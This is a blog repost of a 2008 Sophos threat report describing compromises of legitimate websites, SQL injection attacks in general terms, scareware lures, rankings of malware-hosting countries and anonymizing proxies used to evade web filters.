Exploiting legitimate websites
In the last couple of years the web has become a majorvector of attack for cybercriminals, replacing their previous reliance on email systems. By exploiting poorly secured legitimate websites hackers have been able to implant malicious code onto them, which then attempts to infect every visitor. One of the reasons the web is so popular is that legitimate websites can attract large numbers of visitors, all of whom are a potential victim.
Many well known organizations and brands have fallen victim to this kind of attack during 2008. Both large and small organizations have been targeted, emphasizing the importance of proper web security across the board.
January 2008: Thousands of websites belonging to Fortune 500 companies, government agencies and schools were infected with malicious code.
February 2008: UK broadcaster ITV was the victim of a poisoned web advert campaign, designed to deliver scareware to Windows and Mac users.
March 2008: A site selling tickets for the Euro 2008 football championship was hacked2, while anti-virus firm Trend Micro found some of its webpages had been compromised
April 2008: Cambridge University Press’s website was compromised so that visitors to its online dictionary were subject to unauthorized hacker scripts
June 2008: As the Wimbledon tennis tournament opened in the UK, the Association of Tennis Professionals site was infected
July 2008: Sony’s US PlayStation website suffered an SQL injection assault which put visiting consumers at risk from a scareware attack
September 2008: BusinessWeek magazine was infected with an SQL injection attack that attempted to download malware from a Russian-based server
October 2008: An area of the Adobe website designed to offer support to video bloggers was compromised by an SQL injection attack
SQL injection attacks
One of the major headline grabbers of 2008 was the SQL injection attack. Such attacks exploit security vulnerabilities and insert malicious code (in this case script tags) into the database
running a site. When user input, for instance via a web form, is not correctly filtered or checked, the code peppers the database with malicious instructions. Recovery can be difficult, and there are numerous cases of website owners cleaning up their database only to be hit again a few hours later
Automated systems
Hackers have developed automated tools that use search engines such as Google to identify potentially vulnerable websites, and then inject code into the servers. Websites are rarely specifically targeted, and are often just unfortunate enough to have been discovered by the cybercriminals’ malware distribution tool.
Cybercriminals are also building their own malwareinfected websites, often using free web-hosting services which do not require users to go through a rigorous identification process. They then use automated systems to plant malicious links on legitimate blogs and web forums,
pointing at these infected sites.
For instance, during 2008 Sophos encountered many examples of legitimate blogs and message boards carrying comments which linked to websites pretending to offer adult videos, but which actually demanded a browser plugin upgrade before anything could be seen. The updated
fake codec or bogus Flash Player software that the user downloaded was in reality scareware that attempts to frighten the user into purchasing fake security software.
Top 10 countries hosting malware on the web
2008 showed the US, China and Russia accounting for almost three quarters of all the world’s websites that spread malware. However, it would be misleading to believe that other countries are not also contributing to the problem.
The top 10 malware hosting countries:
US 37.0%
China (inc HK) 27.7%
Russia 9.1%
Germany 2.3%
South Korea 2.1%
Ukraine 1.8%
UK 1.7%
Turkey 1.5%
Czech Republic 1.3%
Thailand 1.2%
Other 14.3%
Sophos research reveals that there is a “long tail” effect with more than 150 countries identified as hosting malware on webpages based within their borders. Of these affected webpages, 85 percent are on legitimate websites that have been hacked by criminals.
User resistance
Although web security is designed to protect against malware and other threats, some users have responded negatively and taken steps to subvert the protection. This is particularly true where companies and organizations filter URLs to particular websites for policy reasons, such as
blocking social networking or video websites.
Anonymizing proxies
Some users have responded to web filtering by using anonymizing proxies9, which disguise the true nature of a website in order to trick an organization’s web filter into allowing access.
Information about public anonymizing proxies is shared freely on thousands of blogs, forums and websites, and there are an unknown number of private anonymizing proxies built for the use of an individuals or small groups. This makes it extremely easy for users to access an anonymizing proxy, but difficult and time-consuming for administrators to track and block them. If users are browsing via anonymizing proxies, then in addition to bypassing URL filtering, they are also
circumnavigating content scanning at the perimeter, which dramatically increases the chance of infection.
Sophos has even identified anonymizing proxies that are themselves infected with malware. It’s not possible to tell whether the anonymizing proxies are the innocent victims of infection, or have been set up with malware embedded inside them. But regardless of whether the infection is
deliberate or not, anyone using them runs the real chance of infecting their computer and the network it is connected to.
Anonymizing proxy use appears to be particularly prevalent among educational establishments, where technology-savvy students attempt to subvert acceptable use policies. Sophos actively tracks internet forums to discover new anonymizing proxy services, and incorporates real-time detection of private anonymizing proxies through traffic inspection in its web appliance.
Malware chart rundown
The US tops the chart with just under three in every eight infected webpages based there. This shows an increase over 2007, when it accounted for less than one in four (23.4 percent) .
China, which was responsible for hosting more than half (51.4 percent) of all the world’s malware
in 2007, has now almost halved its proportional contribution to the problem.
The Czech Republic is a new entrant on the list and hosts over one percent of all the world’s malware on the web.
Poland, France, Canada, Netherlands were present in positions six, eight, nine and ten respectively in 2007, but now have too few malicious websites to appear on the chart.
Sophos.com
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment